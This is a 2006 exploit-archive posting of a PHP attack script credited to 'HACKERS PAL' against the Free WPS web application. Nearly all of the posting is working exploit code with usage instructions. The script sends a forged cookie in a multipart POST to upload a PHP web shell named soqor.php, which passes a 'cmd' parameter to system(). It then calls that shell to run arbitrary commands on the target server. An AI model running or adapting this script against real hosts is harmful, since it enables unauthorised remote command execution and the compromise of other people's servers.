Home / os / solaris

freewps-exec.txt

Posted on 12 October 2006

Hello,, Free WPS File upload Command execution Vulnerability Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net exploit : #!/usr/bin/php -q -d short_open_tag=on <? /* /* Free WPS Command execution /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ echo(' /**********************************************/ /* FreeWPS Command Execution */ /* by HACKERS PAL <security@soqor.net> */ /* site: http://www.soqor.net */'); if ($argc<4) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host path cmd /* Example: */ /* php '.$argv[0].' localhost /freewps/ id /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } function connect($packet) { global $host, $port, $html; $con=fsockopen(gethostbyname($host),$port); if (!$con) { echo '[-] Error - No response from '.$host.':'.$port; die; } fputs($con,$packet); $html=''; while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($con,1); } GLOBAL $html; fclose($con); } $i=0; $data=""; function add_data($name,$value,$type="no",$filename) { GLOBAL $data,$i; if($type=="file") { $data.="-----------------------------7d62702f250530 Content-Disposition: form-data; name="$filename"; filename="$name"; Content-Type: text/plain $value "; } elseif($type=="init") { $data.="-----------------------------7d62702f250530--"; } elseif($type=="clean") { $data=""; } else { $data.="-----------------------------7d62702f250530 Content-Disposition: form-data; name="$name"; Content-Type: text/plain $value "; } } $host=$argv[1]; $path=$argv[2]; $cmd=$argv[3]; $port=80; $cmd=urlencode($cmd); $p='http://'.$host.':'.$port.$path; Echo " [+] Trying to Upload File"; $cookie="Master=HACKERS20%PAL"; $contents='<?php $cmd=($_GET[cmd])?$_GET[cmd]:$_POST[cmd]; system($cmd); ?>'; add_data("empty.php","","file","File1"); add_data("soqor.php",$contents,"file","File2"); add_data("soqor.php",$contents,"file","File3"); add_data('','',"init"); $packet="POST ".$p."upload.php?&-269001946=1&-834358190=1 HTTP/1.0 "; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* "; $packet.="Referer: http://".$host.$path."profile.php?mode=editprofile "; $packet.="Accept-Language: it "; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530 "; $packet.="Accept-Encoding: gzip, deflate "; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) "; $packet.="Host: ".$host." "; $packet.="Content-Length: ".strlen($data)." "; $packet.="Connection: Close "; $packet.="Cache-Control: no-cache "; $packet.="Cookie: ".$cookie." "; $packet.=$data; connect($packet); if (eregi("Successfully uploaded <soqor.php>",$html)) { echo " [+] Successfully uploaded ... [+] Go To http://".$host.$path."upload/soqor.php?cmd=$cmd for your own commands.. [+] The Result Of The Command "; Echo get_page($p."upload/soqor.php?cmd=".$cmd); } else { echo " [-] Unable to Upload File [-] Exploit Failed"; } echo (" /* Visit us : WwW.SoQoR.NeT */ /**********************************************/"); ?>

 

TOP